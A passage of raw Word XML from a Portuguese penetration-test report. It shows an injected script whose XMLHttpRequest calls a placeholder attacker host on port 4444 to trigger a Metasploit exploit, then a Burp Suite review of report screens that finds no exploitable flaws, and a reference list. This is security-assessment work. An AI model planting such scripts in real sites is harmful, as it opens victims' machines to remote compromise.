        <w:t>new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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spell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(</w:t>
      </w:r>
      <w:proofErr w:type="gram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 xml:space="preserve">); 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r.open</w:t>
      </w:r>
      <w:proofErr w:type="spell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(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1C21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1C21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GET"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,’</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1155CC"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1155CC"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>://IP_do_servidor:4444’,false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t>)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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>r.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="303336"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>setRequestHeader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="303336"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="303336"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="353528"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFAF6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Access-Control-Allow-Origin</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="303336"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”,”*”);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:spacing w:after="22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15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="6A737C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r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</w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gram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</w:rPr>
        <w:t>send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="181A1C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>();</w:t>
      </w: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&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="6A737C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>script&gt;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5F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Resultados esperados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F06E4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>Espera-se que a conexão não seja aberta.</w:t>
      </w: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04AF1" w:rsidRPr="00F15F82" w:rsidRDefault="005967D5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>Relatório de execução</w:t>
      </w:r>
      <w:r w:rsidR="001E29F7" w:rsidRPr="00F15F8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0F06E4" w:rsidRPr="00F15F8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76012" w:rsidRPr="00F15F82"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="00881DA5" w:rsidRPr="00F15F82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D76012" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>passou nos testes</w:t>
      </w:r>
      <w:r w:rsidR="000F06E4" w:rsidRPr="00F15F82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8C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Conforme as figuras 32 e 33, a</w:t>
      </w:r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requisição foi bem sucedida e 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Metasploit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 xml:space="preserve"> conseguiu iniciar o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C6DC7"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="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000F06E4" w:rsidRPr="00F15F8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C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="000F06E4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5F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Através dess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exploit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 xml:space="preserve">, uma conexão entre máquina atacada e o sistema atacante é aberta podendo haver graves consequências como: Escalada de privilégios na máquina atacada e criação de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>backdoors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRPr="00F15F82" w:rsidRDefault="00751591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77F75" w:rsidRPr="00F15F82" w:rsidRDefault="00E77F75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80F81A" wp14:editId="32BABE7C">
            <wp:extent cx="5400040" cy="199453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31</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r w:rsidR="00E52417" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Console do navegador indicando a conexão.</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F8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77F75" w:rsidRPr="00F15F82" w:rsidRDefault="00E77F7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                             </w:t>
      </w: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2A6800" wp14:editId="12E49062">
            <wp:extent cx="3600450" cy="13239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15F82" w:rsidRDefault="00777DDF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32</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F8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Exploit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inciado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com sucesso.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F06E4" w:rsidRPr="00F15F82" w:rsidRDefault="000F06E4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5.2 </w:t>
      </w:r>
      <w:r w:rsidR="00777DDF" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Atividade</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00777DDF" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: mapeamento</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de vulnerabilidades – Tela Relatório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i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tarefa realizada dia 24/05/16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ab/>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005A089C" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Duração total das sessões executadas</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: 15 minutos.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lastRenderedPageBreak/>
        <w:t>Objetivo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Utilizar o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Burp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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Suite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para descobrir as vulnerabilidades existentes na tela Relatório e indicar as possíveis técnicas que devem ser utilizadas para explorar as vulnerabilidades encontradas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC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F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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>Resultados obtidos no momento de gerar um relatório dos dados cadastrados no sistema:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D038A" w:rsidRPr="00F15F82" w:rsidRDefault="000D038A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F15F82" w:rsidRDefault="000D038A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83C4E9" wp14:editId="0B25F929">
            <wp:extent cx="5400040" cy="12706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34(Editada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91" w:rsidRPr="00F15F82" w:rsidRDefault="00777DDF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Figura 33 </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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Burp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DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Suite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizado para captura de parâmetros no cabeçalho de uma requisição HTTP na tela Relatório.</w:t>
      </w:r>
      <w:r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De acordo com o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Burp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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Suite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, a página não recebe nenhum parâmetro</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> pois</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> todos os dados disponíveis da aplicação são trazidos direto da base de dados para a tela</w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:ind w:left="0" w:firstLine="709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Quando se utiliza os campos de filtros na tela, não há requisição, pois a aplicação usa os dados carregados para filtrar os dados que serão exibidos no relatório</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82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Pr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mediante a esse contexto, não foram encontradas vulnerabilidades que pudessem ser exploradas.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82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:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:spacing w:after="0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:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Resultados obtidos no momento de gerar uma impressão para um relatório:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77F75" w:rsidRPr="00F15F82" w:rsidRDefault="00E77F7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8A" w:rsidRPr="00F15F82" w:rsidRDefault="000D038A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D45D8E" wp14:editId="5015EB40">
            <wp:extent cx="5400040" cy="11036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35(Editada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91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>Figura 3</w:t>
      </w:r>
      <w:r w:rsidR="00777DDF" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82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15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Burp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5F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Suite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizado para captura de parâmetros no cabeçalho de uma requisição HTTP na tela Impressão de Relatório.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Da mesma maneira que </w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>foi detectado na tela Relatório</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, a ferramenta indica que a tela Impressão de Relatório não gera nenhum tipo de requisição e não recebe nenhum parâmetro manipulável. Dessa forma, não foram encontradas vulnerabilidades que pudessem ser exploradas.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82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15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Referências</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10D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F15F82" w:rsidP="00630433">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr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4">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Piores Senhas 2015</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00F15F82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5" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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SQLMAP usando POST</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId46"/>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00F15F82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7" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>NTP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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8C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00F15F82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48" w:history="1">
        <w:proofErr w:type="gramStart"/>
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>NetBios</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
      </w:hyperlink>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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8C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00F15F82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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId49" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SNMP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00F15F82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0" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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CORS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00F15F82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1" w:history="1">
        <w:proofErr w:type="gramStart"/>
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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>w3c</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:bCs/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve"> - Especificação CORS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00F15F82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2" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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MYSQL</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00F15F82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365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId53" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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SQL Server</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00F15F82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color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId54" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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Sintaxe comentários Oracle</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00BC5DD9" w:rsidRPr="00F15F82" w:rsidRDefault="00F15F82" w:rsidP="00630433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Hyperlink"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId55" w:history="1">
        <w:r w:rsidR="00BC5DD9" w:rsidRPr="00F15F82">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:bCs/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>L2TP</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
